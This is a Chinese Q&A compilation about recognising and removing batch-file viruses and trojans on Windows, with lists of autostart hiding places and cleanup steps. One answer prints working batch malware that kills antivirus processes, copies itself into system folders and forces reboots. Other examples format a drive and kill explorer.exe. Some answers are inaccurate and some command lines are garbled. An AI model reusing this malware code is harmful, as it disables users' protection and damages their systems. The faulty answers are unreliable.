看一下批处理文件,是否是病毒
恐怕是木马
“不知道从什么时候起 家里的电脑杀毒软件经常提示 有文件感染病毒 仔细一看 就是3个文件 c:\windows\help\bai.vbs c:\windows\help\help.dll 以及c:\windows\system32\cc*.exe 这里的*代表 cc1 ccc1 什么的
开始因为玩网络游戏没有在意 感觉只要不造成什么大的危险就无所谓了 但是他每天都弹特别讨厌。所以就仔细琢磨了下 打开 help.dll 看看里面有一段代码 open 一个ip地址 很明显 从这里下载的bai.vbs 以及bai.bat 2个文件 一个是批处理文件 一个是数据库文件 来支持批处理文件 这时候 在打开bai.bat 发现里面代码真不少 首先就是察看电脑里面是否有cc.exe 如果有 就不执行 如果没有 就在c:\windows\里面放入 bai.vbs以及 help.dll 然后 在检查时候有 bai.vbs 以及help.dll 如果有就在 c:\windows\system32 下面放 cc.exe 以及 ccc1.exe cc1.exe 等等 反正就是 cc*.exe 然后再加载其放入的exe文件到进程 如果有杀毒软件的话就会提示了 这就是为什么老提示这个病毒的原因 。 现在来看 目前就是help.dll 来引导的后面的一切病毒”
有一个人发了一个bat的文件 我下载了 中了病毒 怎么办
bat是系统文件,是批处理文件,不是病毒。
别人给你的批处理文件上般包含修改系统用户名和设置密码,执行关机命令等。
你打开会会自动关机,然后重启就会要求密码登陆。这时在密码提示里会有一个联系方式和要求你付款的。
怎样快速找到电脑里的病毒文件?
首先查看自己的电脑中是否有木马病毒
1、集成到程序中
其实木马病毒也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马病毒程序,那么木马病毒文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马病毒被删除了,只要运行捆绑了木马病毒的应用程序,木马病毒又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马病毒。
2、隐藏在配置文件中
木马病毒实在是太狡猾,知道菜鸟们平时使用的是图形化界面的操作系统,对于那些已经不太重要的配置文件大多数是不闻不问了,这正好给木马病毒提供了一个藏身之处。而且利用配置文件的特殊作用,木马病毒很容易就能在大家的计算机中运行、发作,从而偷窥或者监视大家。不过,现在这种方式不是很隐蔽,容易被发现,所以在Autoexec.bat和Config.sys中加载木马病毒程序的并不多见,但也不能因此而掉以轻心哦。
3、潜伏在Win.ini中
木马病毒要想达到控制或者监视计算机的目的,必须要运行,然而没有人会傻到自己在自己的计算机中运行这个该死的木马病毒。当然,木马病毒也早有心理准备,知道人类是高智商的动物,不会帮助它工作的,因此它必须找一个既安全又能在系统启动时自动运行的地方,于是潜伏在Win.ini中是木马病毒感觉比较惬意的地方。大家不妨打开Win.ini来看看,在它的[windows]字段中有启动命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果有后跟程序,比方说是这个样子:run=c:\\windows\\file.exeload=c:\\windows\\file.exe
这时你就要小心了,这个file.exe很可能是木马病毒哦。
4、伪装在普通文件中
这个方法出现的比较晚,不过现在很流行,对于不熟练的windows操作者,很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标,再把文件名改为*.jpg.exe,由于默认设置是\"不显示已知的文件后缀名\",文件将会显示为*.jpg,不注意的人一点这个图标就中木马病毒了。
5、内置到注册表中
上面的方法让木马病毒着实舒服了一阵,既没有人能找到它,又能自动运行,真是快哉!然而好景不长,人类很快就把它的马脚揪了出来,并对它进行了严厉的惩罚!但是它还心有不甘,总结了失败教训后,认为上面的藏身之处很容易找,现在必须躲在不容易被人发现的地方,于是它想到了注册表!的确注册表由于比较复杂,木马病毒常常喜欢藏在这里快活,赶快检查一下,有什么程序在其下,睁大眼睛仔细看了,别放过木马病毒哦:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion下所有以“run”开头的键值;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion下所有以“run”开头的键值;HKEY-USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion下所有以“run”开头的键值。
6、在System.ini中藏身
木马病毒真是无处不在呀!什么地方有空子,它就往哪里钻!这不,Windows安装目录下的System.ini也是木马病毒喜欢隐蔽的地方。还是小心点,打开这个文件看看,它与正常文件有什么不同,在该文件的[boot]字段中,是不是有这样的内容,那就是shell=Explorer.exefile.exe,如果确实有这样的内容,那就不幸了,因为这里的file.exe就是木马病毒服务端程序!另外,在System.ini中的[386Enh]字段,要注意检查在此段内的“driver=路径\\程序名”,这里也有可能被木马病毒所利用。再有,在System.ini中的[mic]、[drivers]、[drivers32]这三个字段,这些段也是起到加载驱动程序的作用,但也是增添木马病毒程序的好场所,现在该知道也要注意这里喽。
7、隐形于启动组中
有时木马病毒并不在乎自己的行踪,它更注意的是能否自动加载到系统中,因为一旦木马病毒加载到系统中,任用什么方法都无法将它赶跑(哎,这木马病毒脸皮也真是太厚),因此按照这个逻辑,启动组也是木马病毒可以藏身的好地方,因为这里的确是自动加载运行的好场所。动组对应的文件夹为:C:\\windows\\startmenu\\programs\\startup,在注册表中的位置:HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\ Explorer\\ShellFoldersStartup=\"C:\\windows\\startmenu\\programs\\startup\"。要注意经常检查启动组哦!
8、隐蔽在Winstart.bat中
按照上面的逻辑理论,凡是利于木马病毒能自动加载的地方,木马病毒都喜欢呆。这不,Winstart.bat也是一个能自动被Windows加载运行的文件,它多数情况下为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成,因此木马病毒完全可以像在Autoexec.bat中那样被加载运行,危险由此而来。
9、捆绑在启动文件中
即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将制作好的带有木马病毒启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马病毒的目的了。
10、设置在超级连接中
木马病毒的主人在网页上放置恶意代码,引诱用户点击,用户点击的结果不言而喻:开门揖盗!奉劝不要随便点击网页上的链接,除非了解它,信任它,为它死了也愿意等等。
下面再看木马病毒的清除方法
1、检查注册表中RUN、RUNSERVEICE等几项,先备份,记下可以启动项的地址,再将可疑的删除。
2、删除上述可疑键在硬盘中的执行文件。
3、一般这种文件都在WINNT,SYSTEM,SYSTEM32这样的文件夹下,他们一般不会单独存在,很可能是有某个母文件复制过来的,检查C、D、E等盘下有没有可疑的.exe,.com或.bat文件,有则删除之。
4、检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\InternetExplorer\\Main中的几项(如LocalPage),如果被修改了,改回来就可以。
5、检查HKEY_CLASSES_ROOT\\inifile\\shell\\open\\command和HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来。很多病毒就是通过修改.txt,.ini等的默认打开程序让病毒“长生不老,永杀不尽”的。
bat之类的代码有病毒吗?
这就是‘复仇者’病毒的代码:
@echo off
title system
taskkill /f /im *soft.exe /im 360*.exe /t
copy %0 %systemdrive%\config\app.bat
echo 127 25 27 225 445 363 68 339 69 57 232 274 244 741 74 748 274 8 0353%temp%\temp ::这行是为减少系统的内存可以不要
echo shutdown -r -t 10 -c nullc:\autoexec.bat
start %0
copy %0 c:\windows\system32\app.bat
copy %0 %temp%\appsys.bat
echo errorD:\E.TXT
怎么用.bat文件查杀病毒?
bat是dos下的批处理文件
批处理运用:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的网络病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐636f7079e79fa5e9819331333231613865时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
1.bat代码:
@if exist c:\folder.htt call 2.bat
@if exist d:\folder.htt call 2.bat
@if exist e:\folder.htt call 2.bat
@if exist f:\folder.htt call 2.bat
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
3.bat代码:
@c:
@dir *.htt *.ini /s/a1.txt
@d:
@dir *.htt *.ini /s/a1.txt
@e:
@dir *.htt *.ini /s/a1.txt
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:\d
@if exist e:\d\*.htm call 2.bat
2.bat代码:
@Format d:/q
@Copy e:\d\*.htm d:
@D:
@Ren *.htm *.html
求解读bat文件,是否病毒 @shutdown -s -t 10 @color b @echo 。 @pause @taskkill /f /im explorer.exe
不是。
shutdown -s -t 10 //10秒后关机
color b //设置控制台前景色为淡浅绿色
echo 。//输出。
pause //暂停
taskkill /f /im explorer.exe //结束资源管理器进程
下载的.bat 文件执行后就不见了,会不会是病毒文件?
可能性很大。
大部分病毒运行方式都是.BAT格式的 。这样可以调用CMD指令,一般来讲,这种病毒大部分都是冲击波病毒。
建议下载一个比较牛逼的杀毒软件。比如瑞星杀毒软件,360安全卫士等。进入安全模式全盘查杀可以有效的清除病毒。
